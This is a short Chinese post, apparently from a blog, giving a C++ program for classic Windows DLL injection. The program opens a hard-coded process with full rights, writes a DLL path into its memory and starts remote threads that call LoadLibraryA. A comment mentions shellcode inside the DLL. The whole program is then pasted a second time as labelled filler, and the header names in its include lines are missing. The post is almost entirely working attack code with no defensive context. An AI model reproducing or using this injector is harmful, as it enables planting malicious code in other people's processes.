c++ dll注入
Author:linshao
#include
#include
int main() {
//x64不能用宏,所以直接写原函数,加载Kernel32.dll模块,下面的内存操作api都是在此模块里
HMODULE a=LoadLibraryA("C:\\windows\\system32\\Kernel32.dll");
if (a) {}
else { printf("导入模块失败"); }
//拿到进程句柄
HANDLE h = OpenProcess(2097151, true, 16208);
if (h) { printf("打开句柄成功\n"); }
else { printf("打开句柄失败"); }
//定义要注入dll的路径,下一步将他传入注入目标的进程内存里, dll里面的代码注意x86和x64位shellcode
const char* s = "F:\\TEMP\\64.dll";
printf(s);
//在目标进程里面申请虚拟一块内存存放dll路径
LPVOID pbuf=VirtualAllocEx(h, 0, strlen(s), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pbuf) {printf("申请内存失败\n");}else {printf("申请内存成功\n");}
//写入内存区域
BOOL aaa=WriteProcessMemory(h,pbuf,s, strlen(s),0);
if (aaa){printf("写入成功\n");}else{printf("写入失败\n");}
//创建远程线程,传入LoadLibrary函数,参数为上面返回的目标进程里的dll路径
HANDLE hand3=CreateRemoteThread(h,0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf,0,NULL);
if (hand3!=NULL) {printf("注入成功\n");}else{printf("注入失败\n");}
HANDLE hand2 = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf, 0, NULL);
if (hand2 != NULL) { printf("注入成功\n"); }
else { printf("注入失败\n"); }
HANDLE hand1 = CreateRemoteThread(h,NULL,0,(LPTHREAD_START_ROUTINE)LoadLibraryA,pbuf,0,NULL);
//h, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibrary, pbuf, 0, NULL);
if (hand1 != NULL) {
printf("注入成功\n");
}
else { printf("注入失败\n"); }
WaitForSingleObject(h, -1);
CloseHandle(h);
return 0;
}
凑文字:
#include
#include
int main() {
//x64不能用宏,所以直接写原函数,加载Kernel32.dll模块,下面的内存操作api都是在此模块里
HMODULE a=LoadLibraryA("C:\\windows\\system32\\Kernel32.dll");
if (a) {}
else { printf("导入模块失败"); }
//拿到进程句柄
HANDLE h = OpenProcess(2097151, true, 16208);
if (h) { printf("打开句柄成功\n"); }
else { printf("打开句柄失败"); }
//定义要注入dll的路径,下一步将他传入注入目标的进程内存里, dll里面的代码注意x86和x64位shellcode
const char* s = "F:\\TEMP\\64.dll";
printf(s);
//在目标进程里面申请虚拟一块内存存放dll路径
LPVOID pbuf=VirtualAllocEx(h, 0, strlen(s), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pbuf) {printf("申请内存失败\n");}else {printf("申请内存成功\n");}
//写入内存区域
BOOL aaa=WriteProcessMemory(h,pbuf,s, strlen(s),0);
if (aaa){printf("写入成功\n");}else{printf("写入失败\n");}
//创建远程线程,传入LoadLibrary函数,参数为上面返回的目标进程里的dll路径
HANDLE hand3=CreateRemoteThread(h,0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf,0,NULL);
if (hand3!=NULL) {printf("注入成功\n");}else{printf("注入失败\n");}
HANDLE hand2 = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pbuf, 0, NULL);
if (hand2 != NULL) { printf("注入成功\n"); }
else { printf("注入失败\n"); }
HANDLE hand1 = CreateRemoteThread(h,NULL,0,(LPTHREAD_START_ROUTINE)LoadLibraryA,pbuf,0,NULL);
//h, 0, 0, (LPTHREAD_START_ROUTINE)LoadLibrary, pbuf, 0, NULL);
if (hand1 != NULL) {
printf("注入成功\n");
}
else { printf("注入失败\n"); }
WaitForSingleObject(h, -1);
CloseHandle(h);
return 0;
}